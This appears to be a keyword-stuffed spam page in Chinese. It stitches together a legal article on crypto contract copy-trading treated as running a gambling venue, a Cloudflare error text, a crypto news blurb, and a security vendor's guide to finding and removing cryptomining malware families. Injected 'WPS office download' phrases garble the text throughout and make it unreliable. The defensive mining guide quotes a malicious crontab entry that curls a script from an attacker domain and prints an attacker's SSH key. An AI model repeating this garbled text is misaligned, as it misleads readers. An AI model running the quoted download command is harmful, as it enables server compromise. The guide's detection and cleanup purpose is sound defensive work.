      什么是WPS office的电脑版的下载网站怎么找交易所合约带单返佣?这里其实有三个层面的意思:虚拟币交易所顾名思义,WPS office的电脑版的下载网站怎么找交易所是专门为WPS office的电脑版的下载网站怎么找提供交易服务的在线平台。用户可以通过注册账户,将WPS office的电脑版的下载网站怎么找或法定货币存入交易所的钱包,进行买卖操作WPS office的官网最新的下载方法在哪里。这些交易所不仅支持WPS office的电脑版的下载网站怎么找之间的交易,还允许用户使用wps office 的官方的下载入口怎么找法定货币(如美元、欧元、人民币等)购买WPS office的电脑版的下载网站怎么找。交易所合约交易所合约是由交易所统一制定的标准化协议,目前的WPS office的电脑版的下载网站怎么找交易所中的合约交易脱胎于传统期货合约。期货合约规定了在未来某一特定时间和地点交割一定数量的标的资产(如商品或金融资产)。期货合约的主要条款包括交易品种、交割日期、交割地点、交割方式、合约规模等,这些条款的标准化使得合约具有较高的流动性和可交易性。而目前WPS office的电脑版的下载网站怎么找交易所玩法多为永续合约,圈内谈及合约基本也默认是永续合约,相对于有交割期限的期货合约而言的,永续合约不设立交割日,没有期限限制。投资者将自己的本金作为保证金,通过交易所提供的杠杆,竞猜虚拟价格涨跌,从而获利(亏损)。交易所主要靠收取手续费获得收入,永续合约中可设定高杠杆的做法则会导致投资者面临极大的风险,而交易所可以获得更高的手续费收入。合约带单返佣合约带单是指由经验丰富的交易者(带单者)分享其合约交易的决策和操作,其他投资者(跟单者)则选择跟随或复制带单者的交易操作,以期望获得类似的收益。这种模式类似于社交交易或复制交易,带单者通常扮演领导者的角色,而跟单者通过模仿其交易来获取收益。而带单返佣就是,这些交易者(基本由kol及散户构成),事先接受WPS office的电脑版的下载网站怎么找交易所的请托,利用自己社群影响力,进行宣传吸引跟单者,从跟单者交易中获取交易所返还的佣金。为什么现在越来越多带单返佣被认定开设赌场罪?显然,开设赌场罪,要求先有赌场设立。首先,带单者没有单独的设立赌场行为。带单者一般分享的注册交易所账号的邀请码,通过邀请码注册的用户,日后在交易所中合约交易的手续费等,交易所会给到KOL对应比例的返佣。因此,如果要认定带单者构成开设赌场罪,必然要求交易所的合约玩法被认定是一种赌博,而交易所就被认定为提供赌博活动的线场所。但交易所合约是否被认定为开设赌场一直存在争议。一方面,如果虚拟币交易所的合约玩法,完全照搬传统的期货合约模式(非永续合约)wps官网最新下载地址是什么。在我们接触到案件中,有的辩护人通过申请监管部门对交易模式认定,将开设赌场罪辩护为非法经营罪。此时,带单员哪怕接受平台返佣,因为平台不构成开设赌场罪,带单员行为也就无法被认定为开设赌场罪(帮助犯)。另一方面,如果虚拟币交易所的进行的是永续合约。在当下的司法实践中,基本都会认定为交易所存在开设赌场行为,据公开案例检索,司法机关认定永续合约为赌博的逻辑主要如下:1.WPS office的电脑版的下载网站怎么找的涨跌具有无规律性、随机性、偶然性的特点。交易所的wps office的免费版下载网址怎么找用户系根据WPS office的电脑版的下载网站怎么找的涨跌预期选择买入开多(看涨)或者卖出开空(看跌),是一种二元期权交易,但涨跌预期依据是交易所获取WPS office的电脑版的下载网站怎么找的交易价值后做加权平均值得来的指数,并没有统一的WPS office的电脑版的下载网站怎么找价格形成机制,价格波动剧烈,涨跌具有偶然性,无规律可循。2.交易所通过高杠杆放大了投机风险,具有高风险性。普通永续合约可添加至100倍的杠杆、疯狂的合约玩法可能1000倍,一旦使用高杠杆,极易造成“爆仓”,此外平台通过设置机器人挂单与玩家进行对赌,促使玩家进行合约交易,通过对WPS office的电脑版的下载网站怎么找的涨跌进行行情的估算,通过风险控制,对买涨或买跌设置上限,提高用户合约交易成本。3.且依据当下政策规定“WPS office的电脑版的下载网站怎么找永续合约交易”即属于非法金融活动,与期货交易明显的不同为没有约定交割时间,为永续合约,交易时间为7×24小时,极高的杠杆倍数并且不存在实物或者现金交割,玩家通过交易所这种交易模式本质与“押大小,赌输赢”的赌博行为无异。因此,参与永续合约带单的人员,会被认为与赌场形成一种代理关系,从而构成开设赌场罪。写在最后,两点提示合约带单返佣存在着明显的法律风险。一方面,合约带单返佣人员不必要抱着侥幸心理,认为国外交易所永续合约不违法,为国外交易所在境内招徕客户也不违法。国情政策不同,不要拿国外框架来套大陆环境。图片另一方面,如果带单返佣行为被当地法律认定为违反了证券法或期货法等相关法规,返佣的金额可能被认定为非法收入,需要退赔;即便是合法收入也可能需要按照当地规定缴纳税款。到时候别问在大陆带单不需要纳税,凭什么外国要纳税。/ END.

  • wps office 的官方的下载网站怎么找(wps office下载手机版安装)

      There is an issue between Cloudflare’s cache and your origin web server. Cloudflare monitors for these errors and automatically wps免费版的下载的地址怎么找 investigates the causewps的官网最新下载的地址是什么. To help support the investigation, you can pull the corresponding error log from your web server and submit it our support teamwps office 的官方的下载的地址是多少. Please include WPS office的官网下载的网址的方法 the Ray ID (which is at the bottom of this error wps office 官方下载的入口在哪 page). Additional troubleshooting wps office 的官方的下载的网址是多少 resources.

  • wps的官网最新的下载方法怎么找

      ChainCatcher消息,据wps的官网下载的网址怎么找FFNews报道,加密借贷平台LanternFinancwps office的免费版下载网站在哪里(wps office下载安装)e宣布完成100万美元Pre-Seed融资,OrangeDAO、Supermwps官网最新下载网址在哪里(wps官网最新首页)oonVentures、AndoverVentures等参投,新资金将支持其wps免费版的下载的网站的方法开发下一代加密货币借贷平台,允许用户以数字资wps office 的官方下载的入口是多少产为抵押借贷并将资金直接存入银行账户wps的官网下载地方在哪里。

  • wps的免费版的下载网址在哪里

      11月16日,国家发改委举行新闻发布会,新闻发言人孟玮表示,将以产业式集中式“挖矿”、国有单位涉及“挖矿”和比特币“挖矿”为重点开展全面整治。

      接连的重拳出击,体现了国家对整治“挖矿”的决心。文章面向企业和个人关心的恶意挖矿攻击的来源、形态和影响进行了全面的描述,最终提供了数十种常见的恶意挖矿家族的自查、清除和防护办法,希望能对业界贡献一点微薄之力。

      v2-e5b78f29e780545c331154b337f38597_b.png

      对于企业机构和广大网民来说,除了面对勒索病毒这一类威胁以外,其往往面临的另一类广泛的网络威胁类型就是感染恶意挖矿程序。恶意挖矿,就是在用户不知情或未经允许的情况下,占用用户终端设备的系统资源和网络资源进行挖矿,从而获取虚拟币牟利。其通常可以发生在用户的个人电脑,企业网站或服务器,个人手机,网络路由器。随着近年来WPS office的电脑版的下载网站怎么找交易市场的发展,以及WPS office的电脑版的下载网站怎么找的金钱价值,恶意挖矿攻击已经成为影响最为广泛的一类威胁攻击,并且影响着企业机构和广大个人网民。

      为了帮助企业机构和个人网民应对恶意挖矿程序攻击,发现和清除恶意挖矿程序,防护和避免感染恶意挖矿程序,奇安信威胁情报中心整理了如下针对挖矿活动相关的现状分析和检测处置建议。

      本文采用Q&A的形式向企业机构人员和个人网民介绍其通常关心的恶意挖矿攻击的相关问题,并根据阅读的人群分为企业篇和个人篇。

      本文推荐如下类人员阅读:企业网站或服务器管理员,企业安全运维人员, 关心恶意挖矿攻击的安全从业者和个人网民。

      通常企业机构的网络管理员或安全运维人员遇到企业内网主机感染恶意挖矿程序,或者网站、服务器以及使用的云服务被植入恶意挖矿程序的时候,都不免提出“为什么会感染恶意挖矿程序,以及是如何感染的”诸如此类的问题。

      我们总结了目前感染恶意挖矿程序的主要方式:

      利用类似其他病毒木马程序的传播方式。

      例如钓鱼欺诈,色情内容诱导,伪装成热门内容的图片或文档,捆绑正常应用程序等,当用户被诱导内容迷惑并双击打开恶意的文件或程序后,恶意挖矿程序会在后台执行并悄悄的进行挖矿行为。

      企业机构暴露在公网上的主机、服务器、网站和Web服务、使用的云服务等被入侵。

      通常由于暴露在公网上的主机和服务由于未及时更新系统或组件补丁,导致存在一些可利用的远程利用漏洞,或由于错误的配置和设置了较弱的口令导致被登录凭据被暴力破解或绕过认证和校验过程。

      奇安信威胁情报中心在之前披露“8220挖矿团伙”[1]一文中就提到了部分常用的远程利用漏洞:WebLogic XMLDecoder反序列化漏洞、Drupal的远程任意代码执行漏洞、JBoss反序列化命令执行漏洞、Couchdb的组合漏洞、Redis、Hadoop未授权访问漏洞。当此类0day漏洞公开甚至漏洞利用代码公开时,黑客就会立即使用其探测公网上存在漏洞的主机并进行攻击尝试,而此时往往绝大部分主机系统和组件尚未及时修补,或采取一些补救措施。

      内部人员私自安装和运行挖矿程序

      企业内部人员带来的安全风险往往不可忽视,需要防止企业机构内部人员私自利用内部网络和机器进行挖矿牟利,避免出现类似“湖南某中学校长利用校园网络进行挖矿”的事件。

      恶意挖矿造成的最直接的影响就是耗电,造成网络拥堵。由于挖矿程序会消耗大量的CPU或GPU资源,占用大量的系统资源和网络资源,其可能造成系统运行卡顿,系统或在线服务运行状态异常,造成内部网络拥堵,严重的可能造成线上业务和在线服务的拒绝服务,以及对使用相关服务的用户造成安全风险。

      企业机构遭受恶意挖矿攻击不应该被忽视,虽然其攻击的目的在于赚取电子货币牟利,但更重要的是在于揭露了企业网络安全存在有效的入侵渠道,黑客或网络攻击团伙可以发起恶意挖矿攻击的同时,也可以实施更具有危害性的恶意活动,比如信息窃密、勒索攻击。

      那么恶意挖矿攻击具体是如何实现的呢,这里我们总结了常见的恶意挖矿攻击中重要攻击链环节主要使用的攻击战术和技术。

      初始攻击入口

      针对企业和机构的服务器、主机和相关Web服务的恶意挖矿攻击通常使用的初始攻击入口分为如下三类:

      远程代码执行漏洞

      实施恶意挖矿攻击的黑客团伙通常会利用1-day或N-day的漏洞利用程序或成熟的商业漏洞利用包对公网上存在漏洞的主机和服务进行远程攻击利用并执行相关命令达到植入恶意挖矿程序的目的。

      下表是结合近年来公开的恶意挖矿攻击中使用的漏洞信息:

      暴力破解wps 的官网下载的地址在哪里(wps官网报价)

      黑客团伙通常还会针对目标服务器和主机开放的Web服务和应用进行暴力破解获得权限外,例如暴力破解Tomcat服务器或SQL Server服务器,对SSH、RDP登录凭据的暴力猜解。

      未正确配置导致未授权访问漏洞

      还有一类漏洞攻击是由于部署在服务器上的应用服务和组件未正确配置,导致存在未授权访问的漏洞。黑客团伙对相关服务端口进行批量扫描,当探测到具有未授权访问漏洞的主机和服务器时,通过注入执行脚本和命令实现进一步的下载植入恶意挖矿程序。

      下表列举了恶意挖矿攻击中常用的未授权漏洞。

      除了上述攻击入口以外,恶意挖矿攻击也会利用诸如供应链攻击,和病毒木马类似的传播方式实施攻击。

      僵尸网络

      攻击者通过各种途径传播僵尸程序感染互联网上的大量主机,而被感染的主机将通过一个控制信道接收攻击者的指令,组成一个僵尸网络。当前利用僵尸网络渠道分发挖矿木马是其主要传播手段之一,僵尸网络在分发挖矿木马的同时,还会下载自动更新模块、远程控制模块、持久化模块等,甚至会利用漏洞来进行传播,感染更多的主机,以此来不断扩大僵尸网络的规模。例如DTLMiner(永恒之蓝下载器木马)、H2Miner、GuardMiner等老牌僵尸网络,背后团伙不断更新其攻击方法,使其在出现后的数年里仍然保持很高的活跃度。

      植入,执行和持久性

      恶意挖矿攻击通常利用远程代码执行漏洞或未授权漏洞执行命令并下载释放后续的恶意挖矿脚本或木马程序。

      恶意挖矿木马程序通常会使用常见的一些攻击技术进行植入,执行,持久化。例如使用WMIC执行命令植入,使用UAC Bypass相关技术,白利用,使用任务计划持久性执行或在Linux环境下利用crontab定时任务执行等。

      下图为在8220挖矿团伙一文[1]中分析的恶意挖矿脚本,其通过写入crontab定时任务持久性执行,并执行wget或curl命令远程下载恶意程序。

      v2-f60d46c4691e4f198cee548f7483023f_b.jpg

      竞争与对抗

      恶意挖矿攻击会利用混淆,加密,加壳等手段对抗检测,除此以外为了保障目标主机用于自身挖矿的独占性,通常还会出现“黑吃黑”的行为。例如:

      修改host文件,屏蔽其他恶意挖矿程序的域名访问

      搜索并终止其他挖矿程序进程
    WPS office的电脑版的下载的网站怎么找
      通过iptables修改防火墙策略,甚至主动封堵某些攻击漏洞入口以避免其他的恶意挖矿攻击利用

      当前恶意挖矿程序主要的形态分为三种:

      自开发的恶意挖矿程序,其内嵌了挖矿相关功能代码,并通常附带有其他的病毒、木马恶意行为

      利用开源的挖矿代码编译实现,并通过PowerShell,Shell脚本或Downloader程序加载执行,如XMRig [7], CNRig [8],XMR-Stak[9]。

      其中XMRig是一个开源的跨平台的门罗算法挖矿项目,其主要针对CPU挖矿,并支持38种以上的币种。由于其开源、跨平台和挖矿币种类别支持丰富,已经成为各类挖矿病毒家族最主要的挖矿实现核心。

      v2-90dfd00fe961b37c40eee0e94323232e_b.jpg

      Javascript脚本挖矿,其主要是基于CoinHive[6]项目调用其提供的JS脚本接口实现挖矿功能。由于JS脚本实现的便利性,其可以方便的植入到入侵的网站网页中,利用访问用户的终端设备实现挖矿行为。

      v2-ad2fd501b3fcc596a9c4a049184a7bb9_b.jpg

      那么如何发现是否感染恶意挖矿程序,本文提出几种比较有效而又简易的排查方法。

      “肉眼”排查或经验排查法

      由于挖矿程序通常会占用大量的系统资源和网络资源,所以结合经验是快速判断企业内部是否遭受恶意挖矿攻击的最简易手段。

      通常企业机构内部出现异常的多台主机卡顿情况并且相关主机风扇狂响,在线业务或服务出现频繁无响应,内部网络出现拥堵,在反复重启,并排除系统和程序本身的问题后依然无法解决,那么就需要考虑是否感染了恶意挖矿程序。

      技术排查法

      1. 进程行为

      通过top命令查看CPU占用率情况,并按C键通过占用率排序,查找CPU占用率高的进程。

      v2-279a98bc94578248336ed8ec2e95b9d2_b.jpg

      2. 网络连接状态

      通过netstat -anp命令可以查看主机网络连接状态和对应进程,查看是否存在异常的网络连接。

      3. 自启动或任务计划脚本

      查看自启动或定时任务列表,例如通过crontab查看当前的定时任务。

      v2-0c79e908b02fb930b0e92ccb169d68f1_b.jpg

      4. 相关配置文件

      查看主机的例如/etc/hosts,iptables配置等是否异常。

      5. 日志文件

      通过查看/var/log下的主机或应用日志,例如这里查看/var/log/cron*下的相关日志。

      v2-6280c1657fb367e68de3aa31174d491d_b.jpg

      6. 安全防护日志

      查看内部网络和主机的安全防护设备告警和日志信息,查找异常。

      通常在企业安全人员发现恶意挖矿攻击时,初始的攻击入口和脚本程序可能已经被删除,给事后追溯和还原攻击过程带来困难,所以更需要依赖于服务器和主机上的终端日志信息以及企业内部部署的安全防护设备产生的日志信息。

      如何防护恶意挖矿攻击:

      1. 企业网络或系统管理员以及安全运维人员应该在其企业内部使用的相关系统,组件和服务出现公开的相关远程利用漏洞时,尽快更新其到最新版本,或在为推出安全更新时采取恰当的缓解措施;

      2. 对于在线系统和业务需要采用正确的安全配置策略,使用严格的认证和授权策略,并设置复杂的访问凭证;

      3. 加强企业机构人员的安全意识,避免企业人员访问带有恶意挖矿程序的文件、网站;

      4. 制定相关安全条款,杜绝内部人员的主动挖矿行为。

      相比企业机构来说,个人上网用户面对着同样相似的恶意挖矿问题,如个人电脑,手机,路由器,以及各类智能设备存在被感染和用于恶意挖矿的情况。像现在手机的硬件配置往往能够提供很高的算力。奇安信威胁情报中心在今年早些就配合网络研究院及多个安全部门联合分析和披露了名为ADB.Miner的安卓蠕虫[2],其就是利用智能电视或智能电视盒子进行恶意挖矿。

      当用户安装了内嵌有挖矿程序模块的APP应用,或访问了植入有挖矿脚本的不安全网站或被入侵的网站,往往就会造成设备算力被用于恶意挖矿。而其影响通常会造成设备和系统运行不稳定,异常发热和耗电,甚至会影响设备的使用寿命和电池寿命。

      以下我们提出几点安全建议让个人用户避免感染恶意挖矿程序:

      1. 提高安全意识,从正常的应用市场和渠道下载安装应用程序,不要随意点击和访问一些具有诱导性质的网页;

      2. 及时更新应用版本,系统版本和固件版本;

      3. 安装个人终端安全防护软件。

      概述

      自查办法

      1. 执行netstat -an命令,存在异常的8220端口连接;

      2. top命令查看CPU占用率最高的进程名为java,如下图为利用Hadoop未授权访问漏洞攻击;

      v2-279a98bc94578248336ed8ec2e95b9d2_b.jpg

      3. 在/var/tmp/目录下存在如java、pscf3、w.conf等名称的文件;

      4. 执行crontab -u yarn -l命令查看是否存在可疑的定时任务;

      v2-0c79e908b02fb930b0e92ccb169d68f1_b.jpg

      5. 通过查看/var/log/cron*相关的crontab日志,看是否存在利用wget访问和下载异常的远程shell脚本。

      wps 的官网的下载地方是多少v2-6280c1657fb367e68de3aa31174d491d_b.jpg

      如何清除和防护

      终止挖矿进程,删除/var/tmp下的异常文件;

      删除异常的crontab任务;

      检查是否存在上述漏洞的组件或服务,若存在则更新相关应用和组件到最新版本,若组件或服务未配置远程认证访问,则开启相应的认证配置。

      概述

      自查方法

      检查是否存在任务计划名为:“MicrosoftWindowsUPnPSpoolsv”的任务;

      检查%windir%目录下是否存在cls.bat和spoolsv.exe和windows.exe文件;

      并检查是否存在可疑的java.exe进程。

      如何清除

      删除检查到的可疑的任务计划和自启动项;

      结束可疑的进程如运行路径为:%windir%IMEMicrosofts和运行路径为%windir%spoolsv.exe和%windir%windows.exe的进程;

      删除c盘目录下的012.exe和023.exe文件。

      防护方法

      安装Windows系统补丁并保持自动更新;

      如果不需要使用Windows局域网共享服务,可以通过设置防火墙规则来关闭445等端口;

      安装奇安信天擎可有效防护该类挖矿病毒的攻击。

      概述

      自查方法Linux平台

      检查是否存在/tmp/hawk 文件;

      检查是否存在/tmp/lower*.sh或/tmp/root*.sh文件;

      检查crontab中是否有可疑的未知定时任务。Windows平台

      检查是否有名为Update*的可疑计划任务和Updater*的可疑启动项;

      检查是否存在%temp%/svthost.exe和%temp%/svshost.exe文件;

      检查是否存在一个rigd32.txt的进程。

      如何清除Linux平台

      可以执行如下步骤执行清除:

      删除crontab中可疑的未知定时任务;

      删除/tmp/目录下的bashd、lower*.sh、root*.sh等可疑文件;

      结束第2步发现的各种可疑文件对应的可疑进程。Windows平台

      可以执行如下步骤进行清除:

      删除可疑的计划任务和启动项;

      结束进程中名为svshost.exe、svthost.exe的进程;

      结束可疑的powershell.exe、regd32.txt等进程;。

      清空%temp%目录下的所有缓存文件。

      防护方法

      如果不需要使用Windows局域网共享服务,可以通过设置防火墙规则来关闭445等端口;

      修改服务器上的数据库密码,设置为更强壮的密码;

      安装系统补丁和升级产品所使用的类库;

      Windows下可以安装奇安信天擎可有效防护该类挖矿病毒的攻击。

      MyKings是一个大规模多重僵尸网络,并安装门罗币挖矿机,利用服务器资源挖矿。

      概述

      自查方法

      检查是否存在以下文件:

      c:windowssystemmy1.bat

      c:windows asksmy1.job

      c:windowssystemcabs.exe

      c:windowssystemcab.exe

      c:windowssystem쾂st.txt

      c:program fileskugou2010ms.exe

      2. 检查是否有名为xWinWpdSrv的服务.

      如何清除

      可以执行如下步骤进行清除:

      删除自查方法1中所列的文件;

      停止并删除xWinWpdSrv服务。

      防护办法

      从僵尸网络当前的攻击重点来看,防范其通过1433端口入侵计算机是非常有必要的。此外,Bot程序还有多种攻击方式尚未使用,这些攻击方式可能在未来的某一天被开启,因此也需要防范可能发生的攻击。对此,WPS office官网最新下载的入口我们总结以下几个防御策略:

      对于未遭到入侵的服务器,注意msSQL,RDP,Telnet等服务的弱口令问题。如果这些服务设置了弱口令,需要尽快修改;

      对于无需使用的服务不要随意开放,对于必须使用的服务,注意相关服务的弱口令问题;

      特别注意445端口的开放情况,如果不需要使用Windows局域网共享服务,可以通过设置防火墙规则来关闭445等端口。并及时打上补丁更新操作系统;

      关注服务器运行状况,注意CPU占用率和进程列表和网络流量情况可以及时发现系统存在的异常。此外,注意系统账户情况,禁用不必要的账户;

      Windows下可以安装奇安信天擎可有效防护该类挖矿病毒的攻击。

      概述

      自查方法

      1. 执行top命令,按”C”查看CPU占用率进程,存在类似com.ufo.miner的进程;

      v2-c5cdc4169a7a64d3f4cc25015e9a2ddf_b.jpg

      2. 执行ps | grep debuggerd命令,存在/system/bin/debuggerd_real进程;

      v2-ceec789fbdfdc9a6bf1ad513d1492328_b.jpg

      3. 执行ls /data/local/tmp命令,查看目录下是否存在如下文件名称:droidbot, nohup, bot.dat, xmrig*, invoke.sh, debuggerd等。

      如何清除

      可以执行如下步骤进行清除:

      pm uninstall com.ufo.miner移除相关挖矿程序APK

      执行ps | grep /data/local/tmp列举相关挖矿进程,执行kill -9进行终止

      执行rm命令删除/data/local/tmp下相关文件

      mv /system/bin/debuggerd_real /system/bin/debuggerd恢复debuggerd文件

      防护办法

      可以采用如下方式进行防护:

      进入设置界面,关闭adb调试或adb wifi调试开关;

      执行setprop service.adb.tcp.port设置调试端口为其他值,ps | grep adbd获得adbd进程并执行kill -9进行终止;

      在root权限下可以配置iptables禁止外部访问5555端口:iptables -A INPUT -p tcp -m tcp –dport 5555 -j REJECT

      概述

      自查办法

      检查SQL Sever服务默认端口,检查 1433端口是否有异常连接

      检查是否存在下述文件:

      C:WINDOWSsystem32system32.exe

      C:ProgramDatasystem32.exe

      C:UsersPublicsystem32.exe

      java/sysin

      3. 检查是否存在异常服务WinTcpAutoProxy

      如何清除和防护

      终止挖矿进程

      加固SQL Server服务器,修补服务器安全漏洞。使用安全的密码策略 ,使用高强度密码,切勿使用弱口令,特别是sa账号密码,防止黑客暴力破解。

      修改SQL Sever服务默认端口,在原始配置基础上更改默认1433端口设置,并且设置访问规则,拒绝1433端口探测。

      删除自查方法2中所述文件

      概述

      自查方法

      检查是否存在服务名为:“MetPipAtcivator”、“SetPipAtcivator”;

      检查是否存在可疑账户名“mm123$”;

      并检查是否存在可疑的rundllhost.exe进程。

      如何清除

      删除检查到的可疑的服务名及账户名;

      结束可疑的进程如运行路径为:%SystemRoot%fonts

      undllhost.exe的进程。

      防护方法

      安装Windows系统补丁并保持自动更新;

      如果不需要使用Windows局域网共享服务,可以通过设置防火墙规则来关闭445等端口;

      安装奇安信天擎可有效防护该类挖矿病毒的攻击。

      概述

      自查方法

      检查是否有名为ScheduledUpdate的可疑计划任务;

      检查C:WindowsSystem32drivers目录下是否存在隐藏文件Winmon.sys、WinmonFS.sys、WinmonProcessMonitor.sys文件;

      检查是否存在一个wup.exe的进程。

      如何清除

      删除可疑的计划任务和启动项;

      结束进程中名为Scheduled.exe、wup.exe的进程;

      删除C:WindowsSystem32drivers目录下的隐藏驱动文件Winmon.sys、WinmonFS.sys、WinmonProcessMonitor.sys。

      防护方法

      如果不需要使用Windows局域网共享服务,可以通过设置防火墙规则来关闭445等端口;

      安装Windows系统补丁并保持自动更新;

      安装奇安信天擎可有效防护该类挖矿病毒的攻击。

      概述

      自查方法

      检查是否存在C:Windows qibchipg目录,以及下述文件:

      C:WindowsSysWOW64

      mnlik.exe

      C:WindowsTempgeazqmbhlhvkeey.exe

      2. 检查是否有名为mekbctynn的服务。

      如何清除

      可以执行如下步骤进行清除:

      删除自查方法1中所列目录下的所有文件以及后述文件;

      停止并删除mekbctynn服务。

      防护办法

      安装Windows系统补丁并保持自动更新,对于无需使用的服务不要随意开放,对于必须使用的服务,注意相关服务的弱口令问题;

      关注服务器运行状况,注意CPU占用率和进程列表和网络流量情况可以及时发现系统存在的异常。此外,注意系统账户情况,禁用不必要的账户;

      Windows下可以安装奇安信天擎可有效防护该类挖矿病毒的攻击。

      概述

      自查办法

      1. 查看恶意文件和相关进程:

      /etc/phpguard

      /etc/phpupdate

      /etc/networkmanager

      2. 查看定时任务(Crontab):

      */30 * * * * sh /etc/newdat.sh

      */2 * * * * curl -fsSL hxxp://h.epelcdn.com/dd210131/pm.sh

      3. 查看恶意SSH公钥(/root/.ssh/authorized_keys):

      AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+Kl2yXiHN5oD9BVTkdIWX wps电脑版下载网址怎么找(wps官网下载为什么没有中文版本) root@u17

      如何清除和防护

      1. 检查tmp、etc目录下是否具有以下文件,清除对应的进程并删除文件:

      /tmp/phpupdate

      /tmp/networkmanager/tmp/phpguard/tmp/newdat.sh/tmp/config.json/etc/phpupdate/etc/networkmanager/etc/config.json/etc/newdat.sh

      2. 删除恶意定时任务;

      3. 删除ssh的authorized_keys中的恶意公钥;

      4. 恢复防火墙的默认配置;

      5. 检查是否存在上述漏洞的组件或服务,若存在则更新相关应用和组件到最新版本,若组件或服务未配置远程认证访问,则开启相应的认证配置。

      概述

      自查办法

      1. 查看恶意文件和相关进程:

      /tmp/.solr/solrd

      /tmp/.solr/config.json

      /tmp/.solr/solr.sh

      2. 查看包含来自pastbin的可疑恶意载荷的定时任务(Crontab)。

      如何清除和防护

      删除恶意文件,并清除相应进程;

      删除恶意定时任务;

      检查是否存在上述漏洞的组件或服务,若存在则更新相关应用和组件到最新版本,若组件或服务未配置远程认证访问,则开启相应的认证配置。

      概述

      自查办法

      1. 查看定时任务:

      存在运行systemd-login的定时任务,后期版本创建的定时任务为随机名,定时任务脚本中除了以拼接的形式直接组成访问的恶意域名外,还会使用了socket5的方式用relay.tor2socks.in代理访问C&C域名

      2. 定时访问带有tor2web、onion字符串的域名或者relay.tor2socks.in;

      3. 在/tmp目录下出现systemd*的文件(后期版本为随机名)。

      如何清除和防护

      1. 删除恶意定时任务;

      2. 清除随机名的挖矿进程,清除残留的systemd-login和*.sh病毒脚本;

      3. 检查是否存在上述漏洞的组件或服务,若存在则更新相关应用和组件到最新版本,若组件或服务未配置远程认证访问,则开启相应的认证配置。

      概述

      自查办法

      1. 查看定时任务:

      存在执行pastebin.com上恶意代码的定时任务

      2. 查看文件:

      /tmp/目录wps的官网最新的下载地方在哪下存在一个名为watchdogs的文件

      3. 访问*.systemten.org域名。

      如何清除和防护

      1. 删除恶意动态链接库 /usr/local/lib/libioset.so;

      2. 删除恶意定时任务;

      3. 清除挖矿进程;

      4. 检查是否存在上述漏洞的组件或服务,若存在则更新相关应用和组件到最新版本,若组件或服务未配置远程认证访问,则开启相应的认证配置。

      概述

      自查办法

      检查有无Photo.scr进程运行;

      检查每个磁盘根目录下有无Photo.scr;

      检查注册表 HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun 下有无Photo.scr相关的自启动。

      如何清除和防护
    wps office 官方下载网址是什么
      终止挖矿进程,删除Photo.scr;

      删除上述自启动项。

      概述

      自查办法

      Crontab中有异常项目;

      有名为wnTKYg的教程运行。

      如何清除和防护

      移除Crontab中的可以项目;

      结束有关键词;

      即时更新相关安全补丁。

      概述

      自查办法

      由于该挖矿家族变种较多,感染路径复杂尚无比较通用的检查方案

      检查有无高CPU占用异常程序;

      检查有无异常corntab项目;

      检查/etc/ld.so.preload内有无恶意预加载项。

      如何清除和防护

      清除有关的恶意进程和启动项;

      即时为相关服务和依赖升级或安装安全补丁。

      概述

      自查办法

      检查是否有文件名为java-log-9527.log,cohernece.txt的文件;

      检查是否存在antitrojan.ps,antivirus.ps1等可疑文件。

      如何清除

      终止可疑文件的进程;

      彻底删除进程对应的文件。

      防护方法

      打上永恒之蓝补丁;

      关闭135,139,445等端口,如果没有业务必要,建议封堵;

      不要使用域管账号随意登录域内机器,域内机器密码应互不相同;

      使用高强度密码,禁止弱口令;

      修补CVE-2016-5195。

      概述

      自查方法

      检查是否存在服务名为:“Server Remote”;

      检查是否存在以下文件:wps 的官网最新下载地址怎么找

      C:Program FilesWindowsdFileftp.exe

      C:Program FilesWindowsdPkil.dllC:Windows

      unsum.exeC:WindowsFontssysIntlhelp.dllC:WindowsHelpwin1ogins.exeC:WindowsPL[A]systemwin1ogins.exeC:WindowsFontssystem(x64)win1ogins.exeC:WindowsFontssystem(x86)win1ogins.exeC:Windwosdellwin1ogins.exe

      如何清除

      结束检查到的可疑的服务;

      终止可疑的进程以及文件如C:Program FilesWindowsdFileftp.exe。

      防护方法

      安装Windows系统补丁并保持自动更新;

      服务器使用安全的密码策略,使用高强度密码,切勿使用弱口令,防止黑客暴力破解;

      安装奇安信天擎可有效防护该类挖矿病毒的攻击。

      概述

      自查方法

      检查是否有名dazsksgmeakjwxo的可疑服务;

      检查C:WindowsSystem32目录下是否存在隐藏文件seser.exe;

      检查是否存在sys.exe,CPUInfo.exe,84.exe等可疑进程。

      如何清除

      中止可疑的服务和进程如dazsksgmeakjwxo服务;

      删除可疑的文件以及自启动项如C:WindowsSystem32seser.exe,sys.exe。

      防护方法

      服务器关闭不必要的端口,例如139、445端口;
    wps的的官网下载的地址是什么(wps下载电脑版要钱吗安卓手机)
      安装永恒之蓝漏洞补丁;

      安装奇安信天擎可有效防护该类挖矿病毒的攻击。

      概述

      自查方法

      C:WindowsSystem32WindowspowershellV1.0powershell.exe 被重命名为随机字符;

      检查是否有/.Xl1/xr的文件;

      /etc/crontab文化见中是否有a.asp的计划任务。

      如何清除

      可以执行如下步骤进行清除:

      终止进程并删除/.Xl1/xr文件;

      删除计划任务以及对应文件。

      防护办法

      安装Windows系统漏洞补丁并保持自动更新,针对使用445端口的业务,进行权限限制;

      采用高强度的密码,避免使用弱口令密码,并定期更换密码;

      如不使用,禁用PowerShell;

      Windows下可以安装奇安信天擎可有效防护该类挖矿病毒的攻击。

      由于获益的直接性,恶意挖矿攻击已经成为当前最为泛滥的一类网络威胁之一,对其有一个全面的了解对于防范此类攻击是一种典型的战术级威胁情报的掌握。企业和机构在威胁情报的支持下采取相应的防护措施,比如通过安全防护设备和服务来更自动化更及时地发现、检测和响应恶意挖矿攻击,奇安信天擎等终端工具可以有效地发现和阻断包括挖矿在内各类威胁。

      1. wps官网最新下载的网站 https://ti.qianxin.net/blog/articles/8220-mining-gang-in-china/

      2. https://ti.qianxin.net/blog/articles/more-infomation-about-adb-miner/

